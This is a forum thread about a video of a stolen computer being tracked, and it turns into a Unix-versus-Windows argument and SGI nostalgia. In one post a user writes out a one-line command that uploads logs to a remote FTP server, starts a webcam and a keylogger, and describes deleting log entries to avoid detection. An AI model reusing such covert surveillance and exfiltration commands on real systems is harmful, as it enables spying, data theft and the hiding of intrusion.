1. Download our Official Android App: Forums for Android!

What Happens When You Steal A Hacker's Computer

Discussion in 'Computers' started by Clarkie, Feb 24, 2011.

  1. Clarkie

    Clarkie Newbie
    Thread Starter
    Rank:
    None
    Points:
    16
    Posts:
    38
    Joined:
    Feb 9, 2011

    Feb 9, 2011
    38
    2
    16

    Advertisement

    ipodman likes this.
  2. MoodyBlues

    MoodyBlues Choose compassion over cruelty
    VIP Member
    Rank:
     #23
    Points:
    1,063
    Posts:
    6,816
    Joined:
    Jan 27, 2011

    Jan 27, 2011
    6,816
    5,710
    1,063
    Formerly Linux sysadmin/programmer
    $HOME/LosAngeles
    That was great. :)
     
  3. brad-short

    brad-short Well-Known Member
    Rank:
    None
    Points:
    58
    Posts:
    187
    Joined:
    May 6, 2010

    Great post, that guy is a Ledge! Bet the dood just bought it off someone tho! lol
     
  4. HKM

    Rank:
    None
    Points:
    63
    Posts:
    422
    Joined:
    Jan 31, 2011

    LOL enjoyed this... even when I am blacklisted the old era brings me back good ol memories.
     
  5. Njcellgeek74

    Njcellgeek74 Well-Known Member
    Rank:
    None
    Points:
    58
    Posts:
    102
    Joined:
    Apr 19, 2010

    Apr 19, 2010
    102
    17
    58
    domestic goddess
    Joisey
    Love it! That guy is awesome!
     
  6. mrspeedmaster

    mrspeedmaster Android Expert
    Rank:
    None
    Points:
    113
    Posts:
    902
    Joined:
    May 16, 2010

    May 16, 2010
    902
    256
    113
    Great video...

    Thats exactly the reason why I run:

    Mac OSX
    Linux
    AIX
    Solaris
    BSD
    and of course, my all time favorite.. IRIX 6.5

    You can never do that with Windows.
     
  7. r0ckstarr

    r0ckstarr Well-Known Member
    Rank:
    None
    Points:
    73
    Posts:
    233
    Joined:
    Feb 23, 2011

    Feb 23, 2011
    233
    61
    73
    Tx
    That was great! Thanks for posting this.
     
  8. HKM

    Rank:
    None
    Points:
    63
    Posts:
    422
    Joined:
    Jan 31, 2011


    Who told you that you can't do that with Windows? Far as naming few OS goes that doesn't impress anyone as it means nothing. I been using *nix for close to 12+ years now, matter of fact people use to call me "hack" but that subject I'm not getting into as I'm blacklisted now.

     
  9. MoodyBlues

    MoodyBlues Choose compassion over cruelty
    VIP Member
    Rank:
     #23
    Points:
    1,063
    Posts:
    6,816
    Joined:
    Jan 27, 2011

    Jan 27, 2011
    6,816
    5,710
    1,063
    Formerly Linux sysadmin/programmer
    $HOME/LosAngeles
    I agree. Although, to be fair, I don't know what windoze can or cannot do at this point as I haven't had the misfortune of touching it in a long time. When I purchased one of my most recent computers I actually booted it up to see what Vista was all about. After a few minutes--during which time I was idiot-prompted a million times--I didn't CARE and quickly rebooted, wiped the drive, and installed Linux.

    Considering that *nix started from the ground up as a multi-user, multi-tasking, multi-location, networked OS with security at its forefront, it's kind of a no-brainer that windoze will never compare.
     
  10. mrspeedmaster

    mrspeedmaster Android Expert
    Rank:
    None
    Points:
    113
    Posts:
    902
    Joined:
    May 16, 2010

    May 16, 2010
    902
    256
    113
    Get back to me when I can SSH into my Windows box from a 5 year old MOBILE phone and run a command like this without even getting caught from suspect:

    tar -c /var/log/system.log | gzip > /tmp/syslog.tgz; ftp -u ftp://me:mypass@ftp.myftp.com/ - `date +%m%d%H%M`.tgz syslog.tgz; /tmp/syslog.tgz ; /etc/init.d/web-cam start; /etc/init.d/keylogger restart -o /tmp/log_this_****er_keyoutputfile.txt

    TARS a folder, gzip, uploads to a server w/ timestamp infile name, deletes the temp tgz file in,Start my usb camera service, and start my keylogger in ONE swoop .

    NO GUI can do this in one execution from one app w/ one click

    I can even get more complicated.

    In one command line you can zip up all the log files you want, you can add new host rules, start daemon processes (e.g. camera frame grabber), add a keylogger, AWK the relevant log records you need, open a port, upload your data, and most importantly,most importantly, delete the last few lines of the system log files to delete any trace you were logged into the system

    Windows Server has some DOS powertool commands. There are also cgywin (but you are basically running a POSIX emulation layer). You are pretty much reliant on the Windows GUI which can lead you to getting caught by your suspect.

    But in order to do what i gave an example of, you'd literally need to VNC/RDP in.

    Even if you get a CLI console access, you have to rely on apps that gave CLI equivalents like creating a thumbnail snapshot from the built in camera.

    For 99% of Windows users and even Windows Admins, you have to do most of that through a GUI. If you wanted to install software to do something, most likely it will leave visible traces such as new apps icons on the start menu, icons on the desktop, registry entries,etc..

    In UNIX, adding a keylogger and usb web camera daemon are command line daemon process executables.

    With UNIX, it is much more powerful and elegant to do it in the CLI. You can install keyloggers, create open ports using IPFW rules and do all the stuff MUCH easier in UNIX. I wonder, can you even console in a Windows box and delete registry entries that showed any trace of your login?
    The fact you can do this with any terminal client makes it even more powerful. You can do this with a smartphone, an iPad, PDA.. I remotely login into my home computer with 5 year cell phones all the time. Try using RDP to a Windows machine with a small 3.2 phone screen isn't very practical.


    Notice how I said much easier in UNIX. It is easier because you don't need a GUI app, a setup.exe or even a vbscript to do what is done in that video.
     
  11. mikedt

    mikedt 你好
    Rank:
     #6
    Points:
    3,488
    Posts:
    27,885
    Joined:
    Sep 22, 2010

    Sep 22, 2010
    27,885
    17,528
    3,488
    Teachaaa
    Jinan, China
    Do you have an SGI MIPS workstation or something? Similar with whatever hardware AIX runs on, an old PS/2 or IBM mainframe?

    SGI is ceasing MIPS IRIX isen't it, in favour of Linux running on x86 hardware.
    http://www.sgi.com/support/services/irix_mips_support.html
     
  12. mrspeedmaster

    mrspeedmaster Android Expert
    Rank:
    None
    Points:
    113
    Posts:
    902
    Joined:
    May 16, 2010

    May 16, 2010
    902
    256
    113
    Irix is dead, abandonware. I run it for nostalgic reasons.

    I have a SGI O2 and an INDY workstation from previous jobs.
    I also have some rare SGI NT rack servers. Back in the dot-com days, I had a beautiful SGI Indy setup w/ the ultrawide SGI LCD 19". My workstation was like $8,000 and it was awesome. I miss those days.

    Irix is the most beautiful OS there is.
    Indigo Magic Desktop blows everything away. Vector based icons that were fully scaleable.
    The User interface was gorgeous.
    Somebody should make a clone of Magic Desktop as a windows manager for Linux.


    I run AIX via a server. Basically just SSH into client's servers.

    I'm trying to get A/UX running now. Apple's first UNIX for Motoroloa 68000 cpus like the old Mac Plus.
    That is more of a hobby though; running vintage OSes.
     
    mikedt likes this.
  13. mikedt

    mikedt 你好
    Rank:
     #6
    Points:
    3,488
    Posts:
    27,885
    Joined:
    Sep 22, 2010

    Sep 22, 2010
    27,885
    17,528
    3,488
    Teachaaa
    Jinan, China
    MaXX Interactive Desktop Community Edition
    This sure looks very similar to SGI's Magic Desktop.
     
  14. mrspeedmaster

    mrspeedmaster Android Expert
    Rank:
    None
    Points:
    113
    Posts:
    902
    Joined:
    May 16, 2010

    May 16, 2010
    902
    256
    113
    That project has been inactive for about 2 years now. Not much activity.

    I really miss SGI. Awesome hardware.
    Servers that could go up to 512 CPUs, 1TB of RAM back in the early 2000s.

    They had chassis where you could pull out RAM, add CPUs on live running systems without re-booting using NUMALINK bricks.
    Incredible technology that is 15-20 years ahead of its time.

    I don't even think you can do that with Linux & x86/x64 Intel CISC architecture. They were literally, true super computers.
    Unfortunately, Intel CISC is cheaper and LINUX is free that lead to SGI's death.

    XFS filesystem was its trump card over Solaris/AIX. We had some good flame wars back then. Irix vs Solaris.
     
  15. Snow_Fox

    Snow_Fox Android Expert
    Rank:
    None
    Points:
    163
    Posts:
    1,498
    Joined:
    Mar 31, 2010

    Mar 31, 2010
    1,498
    131
    163
    Um... while it is cool to be able to do all of that..

    doesn't it also equate to a boat load of security holes in systems outside of windows?

    I am trying to create a keylogger for windows right now and its complex.

    *NOTE*

    I am an enrolled CMPS Major at a university and we are doing this as the project we picked.

    I am really worried about grabbing people's FB passwords for petty vengeance or stealing people's identities..

    We just had to pick a project and it seemed different.
     
  16. mrspeedmaster

    mrspeedmaster Android Expert
    Rank:
    None
    Points:
    113
    Posts:
    902
    Joined:
    May 16, 2010

    May 16, 2010
    902
    256
    113
    Not in the context of this video.

    It is not a security hole whatsoever if you are the Administrator, ROOT, SuperUser of your own machine.

    You should be able to run whatever you want. The guy's machine was stolen and he simply used common sense things to get his machine back. I would have done things differently.

    It wasn't really hacking. The guy was just funny w/ his Southern and Australian accent. The commentary is what made the video funny.

    In fact, it is all junior level-sysadmin stuff.
     
  17. Snow_Fox

    Snow_Fox Android Expert
    Rank:
    None
    Points:
    163
    Posts:
    1,498
    Joined:
    Mar 31, 2010

    Mar 31, 2010
    1,498
    131
    163
    Oh don't mistake me I am very familiar with all the terminology and how he did it and just thought "oh god if I ever have something stolen, I hope I am that lucky."

    But, I was more commenting on your ability to do everything you stated above from a mobile phone..

    You said you could do it all from one command.. and I could be wrong as I am not extremely familiar with command prompt as I would like to be.. But, I saw no commands dictating super user/root/admin status which (I suppose I'm stupid) could be taken to mean you could hypothetically do it from any 5 year old mobile phone and root was not required meaning if someone were capable of figuring out one or two details your entire system is compromised.

    You have to understand I have minimal experience in linux (although I do love using it when I can)
     
  18. mrspeedmaster

    mrspeedmaster Android Expert
    Rank:
    None
    Points:
    113
    Posts:
    902
    Joined:
    May 16, 2010

    May 16, 2010
    902
    256
    113
    When you log in, you can log in as root.

    ssh root@mycomputer.dyndns.org

    or you elevate yourself to root

    ssh user@mycomputer.dyndns.org
    then you elevate yourself to root by
    # sudo -s
    or
    # su

    Once you are root, you can do whatever.
    You can run multiple commands by daisy chaining with ";"
    E.G.

    more logs | grep 'find entry' > /tmp/find.txt;cp /tmp/find.txt /volumes/copy; rm /tmp/find.txt

    With one line, I ran 3 commands in sequence. Basically, daisy chaining your commands.
    I first scanned a log file w/ a keyword. Piped it to a temp file. Then I copied the temp file to a new location and lastly, I removed the temp file. I didn't have to interact with it after I executed it.

    You can do this from an Android phone or an iPhone.
    I use an Incredible w/ Connectbot and with the middle trackpad, it is like using a regular console for me.

    Of course with a phone, you'd probably want to type out your commands in a text editor/notepad then copy-n-paste them into your shell to minimize mistakes. Or, type it out as a bash script on your phone and just scp the script (which has all your commands in sequences) to the host and run the scp file.

    Edit: BTW, there has been SSH terminal clients on Nokia Symbian/Windows Machines as far back as 8 years. I've been doing this stuff off WinMo phones since 1994. Phones like the CIngular 2125, Blackjack, HTC Touch Pro,etc....connecting to my OSX machine.
    No rooting required. You just need a good terminal emulator to console into your host. Command line will be more efficient, reliable over slow cellular connections versus running something like VNC.

    Dont get me started on what you can do w. an iPad. Remote X11.
     
  19. ipodman

    ipodman Newbie
    Rank:
    None
    Points:
    35
    Posts:
    33
    Joined:
    Mar 1, 2011

    Mar 1, 2011
    33
    0
    35
    As little as I can
    On the Web
    Had me laughing, great Vid.
     
  20. Bob Cat

    Bob Cat Careful, They're sharp!!
    VIP Member
    Rank:
    None
    Points:
    513
    Posts:
    7,042
    Joined:
    Nov 17, 2010

    Nov 17, 2010
    7,042
    4,287
    513
    Midland's, South Carolina
    Whew my head hurts after that.:D
     

Share This Page

Loading...